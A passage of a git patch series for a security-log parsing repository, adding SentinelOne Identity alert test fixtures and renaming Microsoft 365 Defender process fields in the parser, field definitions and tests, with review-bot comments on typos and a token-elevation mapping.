@@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935342-d073-7ed0-8c5e-2373fc013310\", \"name\": \"Default Admin Account Usage\", \"description\": \"This event is raised for default administrator account logon anywhere in the domain.\", \"detectedAt\": \"2024-11-22T09:45:07.655Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:07.655Z\", \"lastSeenAt\": \"2024-11-22T09:45:07.655Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935342-d073-7ed0-8c5e-2373fc013310\", \"name\": \"Default Admin Account Usage\", \"description\": \"This event is raised for default administrator account logon anywhere in the domain.\", \"detectedAt\": \"2024-11-22T09:45:07.655Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:07.655Z\", \"lastSeenAt\": \"2024-11-22T09:45:07.655Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:45:07.655000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised for default administrator account logon anywhere in the domain.", + "start": "2024-11-22T09:45:07.655000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:45:07.655000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935342-d073-7ed0-8c5e-2373fc013310", + "name": "Default Admin Account Usage", + "status": "NEW" + } + } + } +} \ No newline at end of file 
diff --git a/SentinelOne/identity/tests/test_alert_9.json b/SentinelOne/identity/tests/test_alert_9.json new file mode 100644 index 000000000..74ab3a7f3 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_9.json 
@@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935322-cc3a-76cc-890b-a1c2d1b815d4\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:10:09.467Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:10:09.467Z\", \"lastSeenAt\": \"2024-11-22T09:10:09.467Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935322-cc3a-76cc-890b-a1c2d1b815d4\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:10:09.467Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:10:09.467Z\", \"lastSeenAt\": \"2024-11-22T09:10:09.467Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:10:09.467000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.", + "start": "2024-11-22T09:10:09.467000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:10:09.467000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": 
"UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935322-cc3a-76cc-890b-a1c2d1b815d4", + "name": "Brute force attack - Mass Account Lockout", + "status": "NEW" + } + } + } +} \ No newline at end of file From e898b653c1cbe982f1f50db26b795f2e018db548 Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Wed, 27 Nov 2024 12:20:13 +0200 Subject: [PATCH 095/150] Apply linter --- SentinelOne/identity/_meta/smart-descriptions.json | 2 +- SentinelOne/identity/ingest/parser.yml | 2 +- SentinelOne/identity/tests/test_alert_2.json | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/SentinelOne/identity/_meta/smart-descriptions.json b/SentinelOne/identity/_meta/smart-descriptions.json index ad570cb92..e09c5db80 100644 --- a/SentinelOne/identity/_meta/smart-descriptions.json +++ b/SentinelOne/identity/_meta/smart-descriptions.json @@ -43,4 +43,4 @@ } ] } -] \ No newline at end of file +] diff --git a/SentinelOne/identity/ingest/parser.yml b/SentinelOne/identity/ingest/parser.yml index 507745cb7..79cd3ec9f 100644 --- a/SentinelOne/identity/ingest/parser.yml +++ b/SentinelOne/identity/ingest/parser.yml @@ -64,4 +64,4 @@ stages: sentinelone.identity.classification: "{{json_event.message.classification}}" sentinelone.identity.confidenceLevel: "{{json_event.message.confidenceLevel}}" sentinelone.identity.result: "{{json_event.message.result}}" - sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}" \ No newline at end of file + sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}" diff --git a/SentinelOne/identity/tests/test_alert_2.json b/SentinelOne/identity/tests/test_alert_2.json index 6d697a5be..39420a5e0 100644 --- a/SentinelOne/identity/tests/test_alert_2.json +++ b/SentinelOne/identity/tests/test_alert_2.json @@ -19,4 +19,4 @@ } } } -} +} \ No newline at end of file From 5421cd89a9054a25770e7ce2e8e8ef1c1c018655 Mon Sep 17 00:00:00 2001 
From: vg-svitla Date: Wed, 27 Nov 2024 12:21:17 +0200 Subject: [PATCH 096/150] Fix datasources --- SentinelOne/identity/_meta/manifest.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml index 449172f8a..33be89396 100644 --- a/SentinelOne/identity/_meta/manifest.yml +++ b/SentinelOne/identity/_meta/manifest.yml @@ -6,3 +6,4 @@ description: >- SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats. data_sources: + Application logs: activites performed on SentinelOne infrastructure are logged From 0c2434b976a689fa0b51c9337ae42ac599183414 Mon Sep 17 00:00:00 2001 
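Review bot: The new `data_sources` entry has a typo, `activites`; suggest `Application logs: activities performed on SentinelOne infrastructure are logged`. This module is the Singularity Identity integration, so describing the source as identity-protection alerts rather than generic infrastructure activity may read more accurately, though that depends on what the connector actually ships.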
From: LenaigKaliou Date: Wed, 27 Nov 2024 16:45:52 +0100 Subject: [PATCH 097/150] Changes on custom fields --- .../microsoft-365-defender/_meta/fields.yml | 254 ++++++++---------- .../microsoft-365-defender/ingest/parser.yml | 74 +++-- .../tests/test_device_event.json | 22 +- ...test_device_event_sensitive_file_read.json | 22 +- .../tests/test_device_events_2.json | 4 +- ...test_device_events_get_clipboard_data.json | 22 +- ...test_device_events_powershell_command.json | 22 +- ..._device_events_shell_link_create_file.json | 22 +- .../tests/test_device_file_event.json | 24 +- .../tests/test_device_file_event_02.json | 24 +- .../tests/test_device_image_load_event.json | 10 +- .../tests/test_device_logon_events.json | 6 +- .../tests/test_device_network_events.json | 26 +- .../tests/test_device_process_events.json | 42 ++- .../tests/test_device_process_events_2.json | 42 ++- .../tests/test_device_registry_events.json | 24 +- .../test_devices_events_script_content.json | 4 +- .../tests/test_email_events.json | 22 +- .../tests/test_email_url_info.json | 22 +- .../tests/test_identity_directory.json | 22 +- .../tests/test_identity_info.json | 22 +- .../tests/test_identity_logon.json | 22 +- .../tests/test_identity_query.json | 22 +- .../tests/test_local_ip.json | 22 +- .../tests/test_process_error.json | 12 +- 25 files changed, 364 insertions(+), 446 deletions(-) diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index 0e6154ccd..c92ffb8db 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml 
@@ -133,6 +133,78 @@ action.properties.ISP: name: action.properties.ISP type: keyword +action.properties.InitiatingProcessAccountObjectId: + description: Azure AD object ID of the user account that ran the process responsible + for the event + name: action.properties.InitiatingProcessAccountObjectId + type: keyword + +action.properties.InitiatingProcessCommandLine: + description: Process commande Line that initiated the event + name: action.properties.InitiatingProcessCommandLine + type: keyword + +action.properties.InitiatingProcessFileSize: + description: Size of the process (image file) that initiated the event + name: action.properties.InitiatingProcessFileSize + type: long + +action.properties.InitiatingProcessIntegrityLevel: + description: Integrity level of the process that initiated the event. Windows assigns + integrity levels to processes based on certain characteristics, such as if they + were launched from an internet download. These integrity levels influence permissions + to resources + name: action.properties.InitiatingProcessIntegrityLevel + type: keyword + +action.properties.InitiatingProcessLogonId: + description: Identifier for a logon session of the process that initiated the event. + This identifier is unique on the same machine only between restarts. 
+ name: action.properties.InitiatingProcessLogonId + type: keyword + +action.properties.InitiatingProcessTokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the process that initiated the event + name: action.properties.InitiatingProcessTokenElevation + type: keyword + +action.properties.InitiatingProcessVersionInfoCompanyName: + description: Company name from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoCompanyName + type: keyword + +action.properties.InitiatingProcessVersionInfoFileDescription: + description: Description from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoFileDescription + type: keyword + +action.properties.InitiatingProcessVersionInfoInternalFileName: + description: Internal file name from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoInternalFileName + type: keyword + +action.properties.InitiatingProcessVersionInfoOriginalFileName: + description: Original file name from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoOriginalFileName + type: keyword + +action.properties.InitiatingProcessVersionInfoProductName: + description: Product name from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoProductName + type: keyword + +action.properties.InitiatingProcessVersionInfoProductVersion: + description: Product version from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoProductVersion + type: keyword + action.properties.IsAdminOperation: description: 
Indicates whether the activity was performed by an administrator name: action.properties.IsAdminOperation 
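Review bot: The description of `action.properties.InitiatingProcessCommandLine` keeps the typo `Process commande Line that initiated the event` from the field it replaces; suggest `Command line of the process that initiated the event`. The same carried-over wording appears in the next hunk for `action.properties.ProcessIntegrityLevel`, where `launched from an internet downloaded` should read `launched from an internet download`. These descriptions are what analysts see when writing rules on the UAC elevation and integrity-level fields, so fixing them while the fields are being renamed avoids a second pass.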
@@ -281,6 +353,51 @@ action.properties.PreviousRegistryValueName: name: action.properties.PreviousRegistryValueName type: keyword +action.properties.ProcessIntegrityLevel: + description: Integrity level of the newly created process. Windows assigns integrity + levels to processes based on certain characteristics, such as if they were launched + from an internet downloaded. These integrity levels influence permissions to resources + name: action.properties.ProcessIntegrityLevel + type: keyword + +action.properties.ProcessTokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the newly created process + name: action.properties.ProcessTokenElevation + type: keyword + +action.properties.ProcessVersionInfoCompanyName: + description: Company name from the version information of the newly created process + name: action.properties.ProcessVersionInfoCompanyName + type: keyword + +action.properties.ProcessVersionInfoFileDescription: + description: Description from the version information of the newly created process + name: action.properties.ProcessVersionInfoFileDescription + type: keyword + +action.properties.ProcessVersionInfoInternalFileName: + description: Internal file name from the version information of the newly created + process + name: action.properties.ProcessVersionInfoInternalFileName + type: keyword + +action.properties.ProcessVersionInfoOriginalFileName: + description: Original file name from the version information of the newly created + process + name: action.properties.ProcessVersionInfoOriginalFileName + type: keyword + +action.properties.ProcessVersionInfoProductName: + description: Product name from the version information of the newly created process + name: action.properties.ProcessVersionInfoProductName + type: keyword + +action.properties.ProcessVersionInfoProductVersion: + description: Product version from the version information of the newly created process + name: 
action.properties.ProcessVersionInfoProductVersion + type: keyword + action.properties.Query: description: String used to run the query name: action.properties.Query 
@@ -412,143 +529,6 @@ action.properties.UserLevelPolicy: name: action.properties.UserLevelPolicy type: keyword -action.properties.process.AccountObjectId: - description: Azure AD object ID of the user account that ran the process responsible - for the event - name: action.properties.process.AccountObjectId - type: keyword - -action.properties.process.CommandLine: - description: Process commande Line that initiated the event - name: action.properties.process.CommandLine - type: keyword - -action.properties.process.FileSize: - description: Size of the process (image file) that initiated the event - name: action.properties.process.FileSize - type: long - -action.properties.process.IntegrityLevel: - description: Integrity level of the newly created process. Windows assigns integrity - levels to processes based on certain characteristics, such as if they were launched - from an internet downloaded. These integrity levels influence permissions to resources - name: action.properties.process.IntegrityLevel - type: keyword - -action.properties.process.LogonId: - description: Identifier for a logon session of the process that initiated the event. - This identifier is unique on the same machine only between restarts. 
- name: action.properties.process.LogonId - type: keyword - -action.properties.process.TokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the newly created process - name: action.properties.process.TokenElevation - type: keyword - -action.properties.process.VersionInfoCompanyName: - description: Company name from the version information of the newly created process - name: action.properties.process.VersionInfoCompanyName - type: keyword - -action.properties.process.VersionInfoFileDescription: - description: Description from the version information of the newly created process - name: action.properties.process.VersionInfoFileDescription - type: keyword - -action.properties.process.VersionInfoInternalFileName: - description: Internal file name from the version information of the newly created - process - name: action.properties.process.VersionInfoInternalFileName - type: keyword - -action.properties.process.VersionInfoOriginalFileName: - description: Original file name from the version information of the newly created - process - name: action.properties.process.VersionInfoOriginalFileName - type: keyword - -action.properties.process.VersionInfoProductName: - description: Product name from the version information of the newly created process - name: action.properties.process.VersionInfoProductName - type: keyword - -action.properties.process.VersionInfoProductVersion: - description: Product version from the version information of the newly created process - name: action.properties.process.VersionInfoProductVersion - type: keyword - -action.properties.process.parent.AccountObjectId: - description: Azure AD object ID of the user account that ran the parent process - responsible for the event - name: action.properties.process.parent.AccountObjectId - type: keyword - -action.properties.process.parent.CommandLine: - description: Parent process commande Line that initiated the event - 
name: action.properties.process.parent.CommandLine - type: keyword - -action.properties.process.parent.FileSize: - description: Size of the parent process (image file) that initiated the event - name: action.properties.process.parent.FileSize - type: long - -action.properties.process.parent.IntegrityLevel: - description: Integrity level of the parent process that initiated the event. Windows - assigns integrity levels to processes based on certain characteristics, such as - if they were launched from an internet download. These integrity levels influence - permissions to resources - name: action.properties.process.parent.IntegrityLevel - type: keyword - -action.properties.process.parent.LogonId: - description: Identifier for a logon session of the parent process that initiated - the event. This identifier is unique on the same machine only between restarts. - name: action.properties.process.parent.LogonId - type: keyword - -action.properties.process.parent.TokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the parent process that initiated the event - name: action.properties.process.parent.TokenElevation - type: keyword - -action.properties.process.parent.VersionInfoCompanyName: - description: Company name from the version information of the parent process (image - file) responsible for the event - name: action.properties.process.parent.VersionInfoCompanyName - type: keyword - -action.properties.process.parent.VersionInfoFileDescription: - description: Description from the version information of the parent process (image - file) responsible for the event - name: action.properties.process.parent.VersionInfoFileDescription - type: keyword - -action.properties.process.parent.VersionInfoInternalFileName: - description: Internal file name from the version information of the parent process - (image file) responsible for the event - name: 
action.properties.process.parent.VersionInfoInternalFileName - type: keyword - -action.properties.process.parent.VersionInfoOriginalFileName: - description: '' - name: action.properties.process.parent.VersionInfoOriginalFileName - type: keyword - -action.properties.process.parent.VersionInfoProductName: - description: '' - name: action.properties.process.parent.VersionInfoProductName - type: keyword - -action.properties.process.parent.VersionInfoProductVersion: - description: Product version from the version information of the parent process - (image file) responsible for the event - name: action.properties.process.parent.VersionInfoProductVersion - type: keyword - email.direction: description: The direction of the message based on the sending and receiving domains name: email.direction diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 0a33f577f..fc32171cd 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
@@ -263,18 +263,18 @@ stages: process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" - action.properties.process.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" - action.properties.process.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" - action.properties.process.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" - action.properties.process.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.process.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}" - action.properties.process.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" - action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" - action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" - action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" - action.properties.process.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" - action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: 
"{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" - set: process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' 
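Review bot: `action.properties.InitiatingProcessTokenElevation` still falls back to `json_event.message.properties.ProcessTokenElevation`, which describes the created process rather than the initiating one. Now that the custom field names mirror the upstream property names one-to-one, that fallback silently stores the wrong process's UAC elevation under a field whose name promises the initiating process's value, which can mislead any rule that keys on parent-process elevation. Suggest `action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"` and, if the created-process value is wanted in this stage too, a separate `action.properties.ProcessTokenElevation` as the following hunk already does. The enclosing `set` stage starts outside the hunk.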
@@ -307,26 +307,26 @@ stages:
 process.name: "{{json_event.message.properties.FileName | basename}}"
 process.command_line: "{{json_event.message.properties.ProcessCommandLine}}"
 process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}"
- action.properties.process.TokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
- action.properties.process.IntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
- action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
- action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
- action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
- action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
- action.properties.process.VersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
- action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
- action.properties.process.parent.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
- action.properties.process.parent.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
- action.properties.process.parent.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
- action.properties.process.parent.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
- action.properties.process.parent.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
- action.properties.process.parent.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
- action.properties.process.parent.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
- action.properties.process.parent.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
- action.properties.process.parent.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
- action.properties.process.parent.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
- action.properties.process.parent.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
- action.properties.process.parent.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
+ action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
+ action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
+ action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
+ action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
+ action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
+ action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
+ action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
+ action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
+ action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
+ action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
+ action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
+ action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
+ action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
+ action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+ action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
+ action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
+ action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
+ action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
+ action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
+ action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
 - set:
 process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}'
@@ -418,7 +418,6 @@ stages:
 event.dataset: "device_events"
 event.category: ["host"]
 action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}"
- #action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
 set_device_file_certificate_info_fields:
 actions:
 - set:
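Review bot: Nothing in this `set` says which of the two flat prefixes describes which process; with `action.properties.process.parent.*` gone, a reader has to work it out from the right-hand sides, where only the `process.parent.args` context line ties `InitiatingProcessCommandLine` to the parent. A one-line comment above the first `action.properties.Process*` entry would settle it, e.g. `# action.properties.* keep the raw Defender column names: Process* is the created process, InitiatingProcess* the process that spawned it`. The enclosing `set` action starts before this hunk.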
@@ -531,15 +530,6 @@ stages:
 - set:
 event.dataset: "device_process_events"
 event.category: ["process"]
- #process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}"
- #process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}"
- #action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
- #action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
- #action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
- #action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
- #action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
- #action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
- #action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
 set_device_registry_events_fields:
 actions:
 - set:
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json
index 17cad5081..ca708b0ed 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json
@@ -16,18 +16,16 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "FileSize": 14687048,
- "LogonId": "121834210",
- "VersionInfoCompanyName": "Google",
- "VersionInfoFileDescription": "Software Reporter Tool",
- "VersionInfoInternalFileName": "software_reporter_tool_exe",
- "VersionInfoOriginalFileName": "software_reporter_tool.exe",
- "VersionInfoProductName": "Software Reporter Tool",
- "VersionInfoProductVersion": "102.286.200"
- }
+ "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "InitiatingProcessFileSize": 14687048,
+ "InitiatingProcessLogonId": "121834210",
+ "InitiatingProcessVersionInfoCompanyName": "Google",
+ "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+ "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoProductVersion": "102.286.200"
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
index 413d002c1..2655cb069 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
@@ -23,18 +23,16 @@
 "action": {
 "properties": {
 "AccountSid": "S-1-2-3",
- "process": {
- "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456",
- "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
- "FileSize": 3316224,
- "LogonId": "5223047",
- "VersionInfoCompanyName": "Test Corporation",
- "VersionInfoFileDescription": "Browser EXE",
- "VersionInfoInternalFileName": "Browser.EXE",
- "VersionInfoOriginalFileName": "Browser.EXE",
- "VersionInfoProductName": "Test Product",
- "VersionInfoProductVersion": "1, 0, 0, 1"
- }
+ "InitiatingProcessAccountObjectId": "12345678-abcd-1234-ef09-abcdef123456",
+ "InitiatingProcessCommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
+ "InitiatingProcessFileSize": 3316224,
+ "InitiatingProcessLogonId": "5223047",
+ "InitiatingProcessVersionInfoCompanyName": "Test Corporation",
+ "InitiatingProcessVersionInfoFileDescription": "Browser EXE",
+ "InitiatingProcessVersionInfoInternalFileName": "Browser.EXE",
